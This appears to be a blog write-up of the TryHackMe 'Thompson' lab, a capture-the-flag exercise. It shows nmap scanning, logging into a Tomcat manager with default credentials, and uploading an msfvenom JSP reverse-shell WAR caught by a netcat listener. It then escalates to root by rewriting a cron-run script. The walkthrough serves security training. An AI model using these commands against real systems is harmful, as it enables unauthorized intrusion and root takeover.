Open in app

Sign in

Write

Sign in

TryHackMe Thompson

Pavan Msvs
4 min readJun 17, 2021

Hello Everyone! Today we are going to solve the TryHackMe machine Thompson

Firstly, connect to the THM machine using VPN and start the machine

Start with Nmap scan to find out the open ports and services running on the machine

Note: If you are running as root, you don’t need to use sudo command

nmap -Pn 10.10.195.168

Perform the advance scan to find out the service versions running on the system

nmap -sC -sV -A 10.10.195.168

Let’s check the IP-address in the browser to find the details in webpage

Check all the pages so that we can find any information, if we open the manager app we can see it is asking for the password

Once we click on cancel we can see it is giving us the username as “tomcat”and password as “s3cret”

Now, try to login with the credentials

We successfully logged into the manager app and we can see lot of directories and information inside and we can see that we can upload a WAR file

Now we can upload a payload and get the reverse shell and it is only accepting the file format as war. Try googling the payload and see what we can find

We found a command to generate a payload to get the reverse shell

ifconfig tun0

The LHOST is our tun0 IP and LPORT we can give any random port

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.93 LPORT=1234 -f war > shell.war

Now upload the shell.war file in the website and before that make sure where it is uploading and confirm that it has uploaded successfully

We can see that it has uploaded under the /manger and we can see our shell has uploaded successfully. Now, start the netcat listener with given port and click on the shell file in the browser and we successfully got our connection

nc -nlvp 1234

Check the user and the current working directory

In the /home/jack folder we found our user flag and to escalate privileges and get the root shell we need to find a way

cat user.txt

Get an interactive shell using python so that we can understand everything

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Now, we have seen another file id.sh and it has all the permission and check whether it runs all the time with the root privileges or not. Go to /etc/crontab

cat /etc/crontab

We can see it runs all the time and only in /home/jack directory it runs and using that we can copy the root flag from /root/root.txt directory and save it to a new file finalflag.txt

echo “cat /root/root.txt > finalflag.txt” > id.sh

Wait for a minute to run the cronjob and we can see our finalflag.txt file

ls

We finally got our root flag, there are other methods also get the flag but I just directly copied from the /root directory to get the flag

cat finalflag.txt

Finally we successfully completed the machine

This concludes the room and both flags have been captured!

--

--

Pavan Msvs

Written by Pavan Msvs

9 Followers

Penetration Tester| WAPT | Bug Bounty Hunter

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams